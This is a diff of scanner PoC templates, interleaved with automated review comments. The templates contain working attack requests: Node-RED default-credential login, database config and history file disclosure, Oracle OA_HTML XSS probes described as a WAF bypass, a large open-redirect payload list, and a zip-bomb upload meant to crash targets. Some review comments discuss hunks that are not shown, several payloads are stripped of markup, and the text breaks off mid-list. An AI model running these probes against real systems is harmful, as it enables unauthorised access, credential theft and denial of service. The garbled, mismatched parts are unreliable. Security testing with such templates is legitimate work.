4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/microsoft/ms-exchange-user-enum.yaml b/poc/microsoft/ms-exchange-user-enum.yaml index ae17add9ab..e5b50fad8b 100644 --- a/poc/microsoft/ms-exchange-user-enum.yaml +++ b/poc/microsoft/ms-exchange-user-enum.yaml 
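Review bot: The new info block of Hikvision_iVMS-8700_upload_action.yaml (hunk starts on the previous line) introduces what look like half-finished edits: `name: HHIKVISION iVMS-8700 upload Webshell file`, `author: zerZero Trust Security Attack and Defense Laboratory` and `Platfor` in the description. Suggest `name: HIKVISION iVMS-8700 - Arbitrary File Upload` and restoring `author: Zero Trust Security Attack and Defense Laboratory`. `id: HIKVISION` is a vendor name rather than a template identifier and does not match the filename; `id: hikvision-ivms-8700-upload-action` would follow the convention used elsewhere on this page. Because the template writes a `test.jsp` file with a fixed name onto the target, it is intrusive and should carry an `intrusive` tag (and ideally a `reference`) so that safe scan profiles can exclude it and a triager knows an artifact may need cleanup.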
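Review bot: The raw request in bloofoxcms-default-login.yaml is written as `POST /admin/index.php HTTP/2`; raw requests in these templates are HTTP/1.1 request lines (every other raw template on this page uses one) and an `HTTP/2` version token in a text request line is not how HTTP/2 is negotiated, so it should read `POST /admin/index.php HTTP/1.1`. `verified: "true"` is a quoted string where the sibling templates use the boolean `verified: true`; keep the metadata typed consistently.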
@@ -36,6 +36,5 @@ http: part: header group: 1 regex: - - '(?i)Email=([A-Za-z0-9@%.-]+)' - -# digest: 4a0a00473045022047f3fcaeec7ba32081ea40264abacc7be7ca55431bed8b2e842c20c6cd5ff0b0022100ddc679fb703c5fee168620fa4656045fe6a6bf3cbffb3b0af3475246e58ef9d8:922c64590222798bb761d5b6d8e72950 + - '(?i)Email=([A-Za-z0-9@%.-_]+)' +# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/microsoft/yzmcms-installer.yaml b/poc/microsoft/yzmcms-installer.yaml index 27c5a9f70b..f07cdce46b 100644 --- a/poc/microsoft/yzmcms-installer.yaml +++ b/poc/microsoft/yzmcms-installer.yaml @@ -4,6 +4,7 @@ info: name: YzmCMS - Installer author: ritikchaddha severity: high + description: YzmCMS is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -35,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100abaead347b32ff2b304417855c674e046e1a3cb9fc8578529ff2709b98042d1802202677f8a402cef74cb69d5f9ed49ec3bef0d54ea0409173c2fc674c52b9300a0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/microsoft/zzzcms-info-disclosure.yaml b/poc/microsoft/zzzcms-info-disclosure.yaml new file mode 100644 index 0000000000..a79ec2a893 --- /dev/null +++ b/poc/microsoft/zzzcms-info-disclosure.yaml 
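Review bot: The corrected extractor regex `(?i)Email=([A-Za-z0-9@%.-_]+)` introduces a range bug: inside a bracket expression `.-_` is a range from `.` (0x2E) to `_` (0x5F), which pulls in `/`, `:`, `;`, `<`, `=`, `>`, `?`, `[`, `\`, `]` and `^` while not matching `-` (0x2D) at all, so the capture can run past the address into following header text and still misses hyphenated addresses. Put the hyphen last or escape it: `- '(?i)Email=([A-Za-z0-9@%._-]+)'`. The yzmcms-installer hunks on this line add a description and a digest and need no review.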
@@ -0,0 +1,42 @@ +id: zzzcms-info-disclosure + +info: + name: Zzzcms 1.75 - Information Disclosure + author: ritikchaddha + severity: low + description: | + There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore + reference: + - https://xz.aliyun.com/t/7414 + metadata: + verified: true + max-request: 1 + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,info,disclosure + +http: + - raw: + - | + GET /plugins/webuploader/js/webconfig.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var adminpath' + - 'var imageMaxSize=' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# digest: 4a0a0047304502202a3a4916c5fadccff982078fec5a98de45b89076f013e080cad56b7f25fd7327022100bc6f7789895c6bb952913f2990bb4214961e49148417b7b16e969c14585ea09d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/mysql/mysql-history.yaml b/poc/mysql/mysql-history.yaml new file mode 100644 index 0000000000..3842f59d4e --- /dev/null +++ b/poc/mysql/mysql-history.yaml 
@@ -0,0 +1,54 @@ +id: mysql-history + +info: + name: Mysql History - File Disclosure + author: kazet + severity: low + description: | + The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands. + reference: + - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html + metadata: + verified: true + max-request: 1 + shodan-query: html:"mysql_history" + tags: misconfig,disclosure,config + +http: + - method: GET + path: + - "{{BaseURL}}/.mysql_history" + + matchers-condition: and + matchers: + - type: word + words: + - "_HiStOrY_V2_" + - "show databases;" + condition: or + + - type: word + part: header + words: + - "application/octet-stream" + - "text/plain" + - "filename=\".mysql_" + + - type: word + part: response + words: + - "" + - "text/html" + - "image/" + negative: true + + - type: status + status: + - 200 + +# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/mysql/weaver-mysql-config-info-leak.yaml b/poc/mysql/weaver-mysql-config-info-leak.yaml new file mode 100644 index 0000000000..85dad0d119 --- /dev/null +++ b/poc/mysql/weaver-mysql-config-info-leak.yaml 
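Review bot: The negative word matcher in mysql-history.yaml lists an empty first word (`- ""`) as rendered here; if the word really is empty rather than an HTML tag lost in rendering (`<html` would be a natural guess), then "response contains empty string" is always true and, negated, the matcher can never pass, so under `matchers-condition: and` the template would never report — please check the source file and make it `- "<html"` if that was the intent. The first body matcher omits `part: body` while the following two name their part explicitly; adding it keeps the matcher list uniform. The `condition: or` on `_HiStOrY_V2_` / `show databases;` is reasonable because the `text/html` negative check is what excludes tutorial pages that quote the same statement.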
@@ -0,0 +1,30 @@ +id: weaver-mysql-config-exposure + +info: + name: OA E-Office mysql_config.ini - Information Disclosure + author: SleepingBag945 + severity: high + description: | + E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: ecology,weaver,oa,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/mysql_config.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/plain")' + - 'contains_all(body,"datapassword", "datauser")' + condition: and + +# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950 diff --git a/poc/nodejs/nodered-default-login.yaml b/poc/nodejs/nodered-default-login.yaml new file mode 100644 index 0000000000..12548d6fb5 --- /dev/null +++ b/poc/nodejs/nodered-default-login.yaml 
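Review bot: `id: weaver-mysql-config-exposure` does not match the filename weaver-mysql-config-info-leak.yaml; rename one of them so `-id` and path-based selection agree. The check is a direct GET of `/mysql_config.ini`, a file exposure rather than a local file inclusion, yet the tags read `ecology,weaver,oa,lfi`; `tags: eoffice,weaver,oa,exposure,misconfig` describes both the finding and the product (E-Office, not E-cology) correctly. Since this is the same file that weaver-officeserver-lfi.yaml earlier on the page reaches through `../mysql_config.ini`, a cross-reference in the description would tell a triager that the two findings confirm the same leaked database credentials.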
@@ -0,0 +1,51 @@ +id: nodered-default-login + +info: + name: Node-Red - Default Login + author: savik + severity: critical + description: | + Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials. + reference: + - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:321591353 + tags: default-login,node-red,dashboard + +http: + - raw: + - | + POST /auth/token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'access_token":' + - 'expires_in":' + - 'token_type":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/oracle/xss-oracle.yaml b/poc/oracle/xss-oracle.yaml new file mode 100644 index 0000000000..10c054b913 --- /dev/null +++ b/poc/oracle/xss-oracle.yaml 
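Review bot: The description of nodered-default-login.yaml states the default credentials allow `RCE`, but the template only verifies that `/auth/token` issues a token for `admin`/`password`; the matcher cannot tell whether the editor is writable or flows can be deployed. Suggest `description: Node-RED accepts the default admin credentials at /auth/token and issues an editor access token; editor access lets flows be deployed, which the cited reference shows leads to code execution on the host.` so the wording matches what is checked while keeping the severity justification. The `max-request: 1` value and the three `access_token` / `expires_in` / `token_type` words are consistent with a single pitchfork pair.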
@@ -0,0 +1,22 @@ +id: xss-oracle + +info: + name: XSS Vulnerability with bypass Akamai WAF 8/11/2024 + author: 111xnagashy + severity: Medium + description: This template checks for an XSS vulnerability in the hidden input field where the 'oncontentvisibilityautostatechange' attribute is used full payload "\">". + tags: xss, WAF bypass, oa_html + +requests: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?username=ttttttttttt\">ttttttttttttttttt" + - "{{BaseURL}}/OA_HTML/ibeCAcdLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt" + - "{{BaseURL}}/OA_HTML/ibeCAcpCustomLogin.jsp?ref=ttttttttttt\">ttttttttttttttttt" + - "{{BaseURL}}/OA_HTML/custibeCAcdPwdAssist.jsp?email=ttttttttttt\">ttttttttttttttttt" + redirects: false + matchers: + - type: word + words: + - "ttttttttttt\">ttttttttttttttttt" + part: body \ No newline at end of file diff --git a/poc/other/12.1.1.2.yaml b/poc/other/12.1.1.2.yaml new file mode 100644 index 0000000000..62b498760a --- /dev/null +++ b/poc/other/12.1.1.2.yaml 
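Review bot: xss-oracle.yaml departs from the template schema in several places: `severity: Medium` should be lowercase `medium`, `tags: xss, WAF bypass, oa_html` contains spaces (tags are a comma-separated list of single lowercase tokens, e.g. `tags: xss,oracle,oa-html`), and the top-level `requests:` key is the legacy form of `http:` used by every other template on this page. The name embeds a date and a WAF-vendor claim that the matcher does not test; if the `OA_HTML` login pages are Oracle E-Business Suite, `name: Oracle E-Business Suite OA_HTML Login Pages - Reflected Cross-Site Scripting` describes the check and the vendor note belongs in `description` or a `reference` (none is given). The matcher only asserts that the probe string is reflected in the body, so adding a header matcher `- type: word part: header words: - text/html` under `matchers-condition: and` avoids reporting reflections in JSON or plain-text error responses where the markup is not interpreted.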
@@ -0,0 +1,59 @@ +id: ASVS-4-0-3-V12-1-1-2 + +info: + name: ASVS 12.1.1.2 (Zipbomb) Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://github.com/ZerosunGitHub/zipbomb + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + +variables: + mode: "quoted_overlap" + num-files: 250 + compressed-size: 21179 + +code: + - engine: + - py + - python + - python3 + source: | + import subprocess + import sys + import os + + mode = os.getenv('mode') + num_files = os.getenv('num-files') + compressed_size = os.getenv('compressed-size') + subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="zipbomb.zip" + Content-Type: application/zip + + {{code_response}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + matchers: + - type: status + name: status_code + status: + - 500 + - 503 +# digest: 490a0046304402203b8787953e9fa8a0e551fc309787addc534c07c2b32f3665f6b307fb8e4cc28802206af2bc67ad42c54ee002eb47b45765e2417ac7bc1ee88414ac0c5c8352bacec1:99354b7c2d97285abe7401b783fba350 \ No newline at end of file diff --git a/poc/other/12.1.1.yaml b/poc/other/12.1.1.yaml new file mode 100644 index 0000000000..60d8604f70 --- /dev/null +++ b/poc/other/12.1.1.yaml 
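Review bot: ASVS-4-0-3-V12-1-1-2 deliberately uploads a decompression bomb and treats a 500/503 from the target as the finding, so it is a destructive denial-of-service test, yet it carries only `tags: asvs,12.1.1`; add `dos,intrusive` so default and safe scan profiles exclude it, and the same applies to the 10 MB upload template ASVS-4-0-3-V12-1-1 in the next hunk. The `code` block shells out to `code/source/zipbomb.py` by a path relative to the working directory that is not shipped in this diff, and `subprocess.run` is called without `check=True`, so when the script is absent the step likely yields an empty `{{code_response}}` and a bodiless request that is still judged on status alone; at minimum document the dependency in `description` and make the script call fail loudly (`check=True`) when it cannot run. The first reference (WSTG 06-Test_HTTP_Methods) concerns HTTP verbs, not upload limits; the File Upload cheat sheet already cited is the relevant one.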
@@ -0,0 +1,64 @@
+id: ASVS-4-0-3-V12-1-1
+
+info:
+ name: ASVS 12.1.1 Check
+ author: Hamed Salimian
+ severity: medium
+ classification:
+ cwe-id: CWE-400
+ reference:
+ - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods
+ - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html
+ - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html
+ tags: asvs,12.1.1
+ description: |
+ Verify that the application will not accept large files that could fill up storage or cause a denial of service.
+
+
+variables:
+ large_file_size: 10000000
+ small_file_size: 100
+ file_type: "text/plain"
+ file_ext: "txt"
+
+http:
+ - raw:
+ - |
+ POST {{BaseURL}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId
+
+ ------WebKitFormBoundaryiugABg7zoMAxIKId
+ Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}"
+ Content-Type: {{file_type}}
+
+ {{rand_text_alpha({{small_file_size}})}}
+ ------WebKitFormBoundaryiugABg7zoMAxIKId--
+
+ - |
+ POST {{BaseURL}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId
+
+ ------WebKitFormBoundaryiugABg7zoMAxIKId
+ Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}"
+ Content-Type: {{file_type}}
+
+ {{rand_text_alpha({{large_file_size}})}}
+ ------WebKitFormBoundaryiugABg7zoMAxIKId--
+
+ extractors:
+ - type: dsl
+ name: status code of large file upload.
+ dsl:
+ - status_code_2
+
+ matchers:
+ - type: dsl
+ name: status_code
+ condition: and
+ dsl:
+ - status_code_2 < 210 && status_code_2 >= 200
+ - status_code_2 == status_code
\ No newline at end of file
diff --git a/poc/other/3867691789.yaml b/poc/other/3867691789.yaml
index 89f5dcf21d..da66e29926
--- a/poc/other/3867691789.yaml
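Review bot: The second DSL condition `status_code_2 == status_code` looks intended to compare the large-file upload with the small-file baseline, but in a multi-request raw template `status_code` normally resolves to the last response — request 2 itself — which makes that line a tautology. `- status_code_2 == status_code_1` is presumably what was meant, so the template only fires when the 10 MB upload receives the same 2xx as the 100-byte one. Note also that `large_file_size: 10000000` has `rand_text_alpha` build a 10 MB body in memory per target, and the nested `{{...}}` inside the function call should be confirmed to expand on the nuclei version this repository targets.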
+++ b/poc/other/3867691789.yaml @@ -1,19 +1,57 @@ id: honeypot + info: - name: honeypot - author: cn-kali-team - tags: detect,tech,honeypot - severity: info + name: "WP Armour Honeypot Anti Spam <= 1.5.6 -Cross-Site Request Forgery to Arbitrary Options Update" + author: topscoder + severity: critical + description: "The Armour Honeypot Anti Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the wpa_save_settings() function in versions up to, and including, 1.5.6. This makes it possible for attackers to modify arbitrary site options granted they can trick an administrator into performing an action such as clicking on a link." + reference: + - https://wordpress.org/plugins/honeypot/#developers + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2462797%40honeypot&new=2462797%40honeypot&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: metadata: - product: honeypot - vendor: 00_unknown - verified: false + fofa-query: "wp-content/plugins/honeypot/" + google-query: inurl:"/wp-content/plugins/honeypot/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,honeypot,critical + http: -- method: GET - path: - - '{{BaseURL}}/' - matchers: - - type: word - words: - -

blog comments

- case-insensitive: true + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/honeypot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "honeypot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '< 1.5.7') \ No newline at end of file diff --git a/poc/other/5.1.5.yaml b/poc/other/5.1.5.yaml new file mode 100644 index 0000000000..6c073bd438 --- /dev/null +++ b/poc/other/5.1.5.yaml 
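Review bot: This rewrite keeps `id: honeypot` (a context line) while turning a generic honeypot detection template (`tags: detect,tech,honeypot` in the removed lines) into a WP Armour CSRF check, so the detection is lost and the id no longer describes what runs; a plugin-slug style id like the other topscoder templates in this commit use would be clearer. `classification.cve-id:` is left empty although `tags` starts with `cve`, and `shodan-query: 'vuln:'` is an unfilled placeholder — supply the values or drop the keys; the advanced-backgrounds and amcharts-charts-and-maps templates in this commit have the same empty `cve-id` and placeholder `shodan-query`. The two extractors both named `version` (one `internal: true`, one not) are easy to mistake for a copy-paste error; a one-line comment such as `# internal copy feeds compare_versions; the second re-exports version for output` would save the next reader the puzzle.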
@@ -0,0 +1,141 @@ +id: ASVS-4-0-3-V5-1-5 + +info: + name: ASVS 5.1.5 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-601 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + - https://cwe.mitre.org/data/definitions/601.html + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ + tags: asvs,5.1.5 + description: | + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + +variables: + vulnerable_parameter: "url" + +http: + - method: GET + path: + - "{{BaseURL}}/{{payload}}" + - "{{BaseURL}}//{{payload}}" + - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" + - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" + + payloads: + payload: + - '%0a/evil.com/' + - '%0d/evil.com/' + - '%00/evil.com/' + - '%09/evil.com/' + - '%5C%5Cevil.com/%252e%252e%252f' + - '%5Cevil.com' + - '%5cevil.com/%2f%2e%2e' + - '%5c{{RootURL}}evil.com/%2f%2e%2e' + - '../evil.com' + - '.evil.com' + - '/%5cevil.com' + - '////\;@evil.com' + - '////evil.com' + - '///evil.com' + - '///evil.com/%2f%2e%2e' + - '///evil.com@//' + - '///{{RootURL}}evil.com/%2f%2e%2e' + - '//;@evil.com' + - '//\/evil.com/' + - '//\@evil.com' + - '//\evil.com' + - '//\tevil.com/' + - '//evil.com/%2F..' + - '//evil.com//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//evil.com@//' + - '//evil.com\tevil.com/' + - '//https://evil.com@//' + - '/<>//evil.com' + - '/\/\/evil.com/' + - '/\/evil.com' + - '/\evil.com' + - '/evil.com' + - '/evil.com/%2F..' 
+ - '/evil.com/' + - '/evil.com/..;/css' + - '/https:evil.com' + - '/{{RootURL}}evil.com/' + - '/〱evil.com' + - '/〵evil.com' + - '/ゝevil.com' + - '/ーevil.com' + - '/ーevil.com' + - '<>//evil.com' + - '@evil.com' + - '@https://evil.com' + - '\/\/evil.com/' + - 'evil%E3%80%82com' + - 'evil.com' + - 'evil.com/' + - 'evil.com//' + - 'evil.com;@' + - 'https%3a%2f%2fevil.com%2f' + - 'https:%0a%0devil.com' + - 'https://%0a%0devil.com' + - 'https://%09/evil.com' + - 'https://%2f%2f.evil.com/' + - 'https://%3F.evil.com/' + - 'https://%5c%5c.evil.com/' + - 'https://%5cevil.com@' + - 'https://%23.evil.com/' + - 'https://.evil.com' + - 'https://////evil.com' + - 'https:///evil.com' + - 'https:///evil.com/%2e%2e' + - 'https:///evil.com/%2f%2e%2e' + - 'https:///evil.com@evil.com/%2e%2e' + - 'https:///evil.com@evil.com/%2f%2e%2e' + - 'https://:80#@evil.com/' + - 'https://:80?@evil.com/' + - 'https://:@\@evil.com' + - 'https://:@evil.com\@evil.com' + - 'https://;@evil.com' + - 'https://\tevil.com/' + - 'https://evil.com/evil.com' + - 'https://evil.com/https://evil.com/' + - 'https://www.\.evil.com' + - 'https:/\/\evil.com' + - 'https:/\evil.com' + - 'https:/evil.com' + - 'https:evil.com' + - '{{RootURL}}evil.com' + - '〱evil.com' + - '〵evil.com' + - 'ゝevil.com' + - 'ーevil.com' + - 'ーevil.com' + - 'redirect/evil.com' + - 'cgi-bin/redirect.cgi?evil.com' + - 'out?evil.com' + - 'login?to=http://evil.com' + - '1/_https@evil.com' + - 'redirect?targeturl=https://evil.com' + + redirects: false + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - type: status + status: + - 301 + - 302 + - 303 + - 304 + - 307 + - 308 diff --git a/poc/other/5.3.3.1.yaml b/poc/other/5.3.3.1.yaml new file mode 100644 index 0000000000..f3fb1a58f5 --- /dev/null +++ b/poc/other/5.3.3.1.yaml 
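Review bot: The payload `//%69%6e%74%65%72%61%63%74%2e%73%68` decodes to `interact.sh` — apparently carried over from the upstream open-redirect-generic template listed in `reference` — so it can never satisfy the Location regex, which only accepts `evil\.com`; drop it or rewrite it as `//%65%76%69%6c%2e%63%6f%6d` to keep the percent-encoded-host case. `304` in the status list is Not Modified, not a redirect, and is dead under `matchers-condition: and` with the Location regex; `301`, `302`, `303`, `307` and `308` are the set that matters. `/ーevil.com` and `ーevil.com` each appear twice — if those are halfwidth and fullwidth katakana forms, a comment saying so would stop someone de-duplicating them later.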
@@ -0,0 +1,54 @@ +id: ASVS-4-0-3-V5-3-3-1 + +info: + name: ASVS 5.3.3.1 (Dom-based XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/dom-xss.yaml + tags: asvs,5.3.3 + description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

"
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file
diff --git a/poc/other/8.2.1.yaml b/poc/other/8.2.1.yaml
new file mode 100644
index 0000000000..83002bb26f
--- /dev/null
+++ b/poc/other/8.2.1.yaml
@@ -0,0 +1,28 @@
+id: ASVS-4-0-3-V8-2-1
+
+info:
+ name: ASVS 8.2.1 Check
+ author: AmirHossein Raeisi
+ severity: info
+ classification:
+ cwe-id: CWE-525
+ reference:
+ - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses
+ - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control
+ tags: asvs,8.2.1
+ description: |
+ Verify the application sets sufficient anti-caching headers so that sensitive data is not cached in modern browsers.
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ stop-at-first-match: true
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?i)cache-control:.*no-store'
+ negative: true
diff --git a/poc/other/9.1.2.yaml b/poc/other/9.1.2.yaml
new file mode 100644
index 0000000000..5170641f4f
--- /dev/null
+++ b/poc/other/9.1.2.yaml
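Review bot: The template is named `Dom-based XSS` but its matchers only confirm that the `{{num}}`-bearing payload (whose surrounding tags did not survive rendering on this page) comes back verbatim in an HTML body; nothing in the headless steps checks that anything executed in the DOM, so this is a reflected-XSS heuristic, not a DOM-XSS test. Since the template already runs headless, the intended check would add a `script` action after `waitload` that inspects the page and a matcher on that result, rather than a body word match. At minimum `description` should state what is actually proved, e.g. `# matches when the payload is reflected unencoded in an HTML response; execution is not verified`.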
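Review bot: The single negative regex `(?i)cache-control:.*no-store` on `part: header` also fires when the root URL answers with a redirect, an error page, or any response with no `Cache-Control` header at all, and on pages that carry nothing sensitive, so the result is noise on most hosts. Under the existing `matchers-condition: and`, add `- type: status` / `status:` / `- 200` so only a successful page is assessed, and decide whether `no-cache`/`private` should count, since the referenced OWASP page treats `Cache-Control`, `Pragma` and `Expires` as a set. `stop-at-first-match: true` has no effect with a single path and can go.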
@@ -0,0 +1,425 @@ +id: ASVS-4-0-3-V9-1-2 + +info: + name: ASVS 9.1.2 Check + author: AmirHossein Raeisi + severity: Low + classification: + cwe-id: CWE-918 + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html + tags: asvs,9.1.2 + description: | + Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - 